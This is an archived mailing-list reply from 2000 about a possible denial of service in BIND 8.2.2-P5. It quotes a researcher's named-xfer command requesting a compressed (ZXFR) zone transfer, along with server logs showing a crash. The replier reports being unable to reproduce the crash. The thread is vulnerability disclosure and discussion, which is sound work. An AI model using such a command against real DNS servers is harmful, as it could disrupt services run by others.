Vulnerability Development mailing list archives

Re: Possible DOS in Bind 8.2.2-P5

From: fire-eyes <sgtphou () FIRE-EYES YI ORG>
Date: Fri, 10 Nov 2000 19:17:04 -0500

"Fabio Pietrosanti (naif)" wrote:


Hi,
playing with bind and ZXFR feature ( zone transfer compressed with a possible insecure
execlp("gzip", "gzip", NULL); ), i discovered a Denial Of Service against Bind 8.2.2-P5 .

By default Bind 8.2.2-P5 it's not compiled with ZXFR support unless you define it with #define BIND_ZXFR
so it will refuse any ZXFR transfer, because it doesn't support it.
But now what appens? Look here...

################################
zone to transfer: zone.pippo.com
dns server:       dns.pippo.com 192.168.1.1
me:               naif.gatesux.com 10.10.10.10
I send a Zone Trasnfer request using "-Z" switch with means that i wish to use ZXFR.
dns.pippo.com does'nt support ZXFR and have "allow-transfer{}" not configured, so everyone
could ask him for *.zone.pippo.com ...

<naif@naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer  -z zone.pippo.com  -d 9 -f pics -Z dns.pippo.com
named-xfer[29297]: send AXFR query 0 to 192.168.1.1
named-xfer[29297]: premature EOF, fetching "zone.pippo.com"

On the server's log:
Nov  7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for "zone.pippo.com"
Nov  7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of "zone.pippo.com" (IN) to 
[10.10.10.10].2284

Then the server "*** CRASHED ***" .

I should assume that bind 8.2.2-P5 it's vulnerable ( Please someone test and confirm this kind of dos)
and bind-9.0.0 has no support for ZXFR .

<naif@naif> [~/bind] $ find src822p5/ -type f -exec grep -i zxfr \{\}  ';' | wc -l
    234
<naif@naif> [~/bind] $ find bind-9.0.0/ -type f -exec grep -i zxfr \{\}  ';' | wc -l
      0

A lot of DNS Server are misconfigured, and allow zone-transfer to any, so they are dossable...

naif
naif () itapac net


I tried this on my bind 8.2.2-P5 on slackware linux 7.0.0 kernel 2.2.17
Intel p200 128M ram.

I tried this in two situations:

        a) named started as 'named -u nobody'
          1> This results in named being run as user nobody

        b) named started as 'ndc start'
          1> This results in named running as root, of course.

In neither of these situations did I find any problems after 10 minutes.

If you have other ways you would like me to try running the daemon, let
me know.

Also, I am rather new at bind. How might I go about denying *XFR's from
all but approved hosts?

Thank You

Joseph

Current thread:

Possible DOS in Bind 8.2.2-P5 Fabio Pietrosanti (naif) (Nov 08)
- Re: Possible DOS in Bind 8.2.2-P5 Przemyslaw Frasunek (Nov 08)
  - Re: Possible DOS in Bind 8.2.2-P5 Fabio Pietrosanti (naif) (Nov 09)
- Re: Possible DOS in Bind 8.2.2-P5 Tomasz Grabowski (Nov 09)
- Re: Possible DOS in Bind 8.2.2-P5 Guy Cohen (Nov 09)
- Re: Possible DOS in Bind 8.2.2-P5 Mariusz Marcinkiewicz (Nov 09)
  - Re: Possible DOS in Bind 8.2.2-P5 (my fault, sorry) Mariusz Marcinkiewicz (Nov 10)
  - Re: Possible DOS in Bind 8.2.2-P5 Olaf Kirch (Nov 10)
    - Re: Possible DOS in Bind 8.2.2-P5 Paul A Vixie (Nov 10)
- Re: Possible DOS in Bind 8.2.2-P5 Daniel Roesen (Nov 10)
- Re: Possible DOS in Bind 8.2.2-P5 fire-eyes (Nov 14)
- <Possible follow-ups>
- Re: Possible DOS in Bind 8.2.2-P5 Fernando Cardoso (Nov 09)
- Re: Possible DOS in Bind 8.2.2-P5 Luke Dudney (Nov 10)
- Re: Possible DOS in Bind 8.2.2-P5 Jonatan Sarba (Nov 14)
  - Re: Possible DOS in Bind 8.2.2-P5 Peter Pentchev (Nov 15)
    - Re: Possible DOS in Bind 8.2.2-P5 Johnson, Jeremiah (Nov 15)
    - Re: Possible DOS in Bind 8.2.2-P5 Matt Zimmerman (Nov 15)
- Re: Possible DOS in Bind 8.2.2-P5 Paul Pot (Nov 15)
- Re: Possible DOS in Bind 8.2.2-P5 Chris Tobkin (Nov 15)